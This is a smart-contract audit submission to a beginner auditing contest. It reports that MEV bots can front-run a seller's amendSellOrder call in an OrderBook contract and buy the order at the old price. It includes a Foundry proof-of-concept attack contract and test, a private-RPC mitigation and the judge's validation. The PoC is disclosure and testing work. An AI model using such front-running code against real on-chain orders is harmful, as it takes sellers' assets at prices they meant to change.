OrderBook

First Flight #43
Beginner Friendly, Solidity
Submission Details
Severity: high
Valid

🛡️ MEV Bots can front-run the transaction to buy the assets at lower cost, When seller calls `OrderBook::amendSellOrder`

Description

Normally a seller can amend an existing sell order to increase or decrease the price of the asset or the quantity. However, MEV bots scan the mempool, where transactions wait before execution, so they can front-run the amend transaction and buy the order (the asset) at the old, lower price. As a result the seller is unable to amend the order, and the order is sold at the old price.

Risk

Likelihood:

  • Reason 1: Whenever a seller calls the `amendSellOrder` function to increase the price of the asset.

Impact:

  • Impact 1: The seller is unable to modify the order.

  • Impact 2: The order is sold at a lower price than the seller wanted.

Proof of Concept

Add the `MevBotAttack` contract and the `test_MevAttackOnSellerAmend` test to your `TestOrderBook.t.sol` file.

```solidity
//@audit add the following MevBotAttack contract to TestOrderBook.t.sol
contract MevBotAttack is Test {
    OrderBook public book;
    address public usdcHolder;

    constructor(OrderBook _book) {
        book = _book;
    }

    // Simulates a mempool bot that front-runs the amend by buying the order first
    function mevBuyOrderInMempool(uint256 orderId) external {
        book.iUSDC().approve(address(book), type(uint256).max);
        book.buyOrder(orderId);
    }
}

//@audit add the test below to the test suite
function test_MevAttackOnSellerAmend() public {
    // Step 1: Alice creates a sell order at the original price
    vm.startPrank(alice);
    wbtc.approve(address(book), 2e8);
    uint256 orderId = book.createSellOrder(
        address(wbtc),
        2e8,
        180_000e6,
        2 days
    );
    vm.stopPrank();

    // Step 2: Fund the MEV bot with Dan's USDC
    MevBotAttack mevBot = new MevBotAttack(book);
    vm.startPrank(dan);
    usdc.transfer(address(mevBot), 200_000e6);
    vm.stopPrank();

    // Step 3: The bot sees Alice's pending amend in the mempool and front-runs it,
    // buying the order at the old price before the amendment lands
    mevBot.mevBuyOrderInMempool(orderId);

    // Step 4: Alice's amend (e.g. to a higher price) now reverts because the order is inactive
    vm.expectRevert(OrderBook.OrderAlreadyInactive.selector);
    vm.prank(alice);
    book.amendSellOrder(orderId, 2e8, 200_000e6, 1 days);

    // Step 5: Assert post-conditions
    assert(wbtc.balanceOf(address(mevBot)) == 2e8);  // the bot now holds the asset
    assert(usdc.balanceOf(alice) == 174_600e6);      // Alice was paid the old price minus the 3% fee
    assert(book.totalFees() == 5_400e6);             // 3% of 180,000 USDC
}
```

Recommended Mitigation

  • Submit the transaction through a private RPC endpoint such as the Flashbots RPC, so that it does not appear in the public mempool where MEV bots can see it.

Updates

Lead Judging Commences

yeahchibyke Lead Judge 10 days ago
Submission Judgement Published
Validated
Assigned finding tags:

Amends or cancellation of sell orders can be front-run

When a seller wants to amend or cancel their sell orders, a malicious entity can front-run their transactions and buy out the orders. This can be especially harmful when real-world prices of listed assets fluctuate and sellers want to adjust the prices listed in their orders.
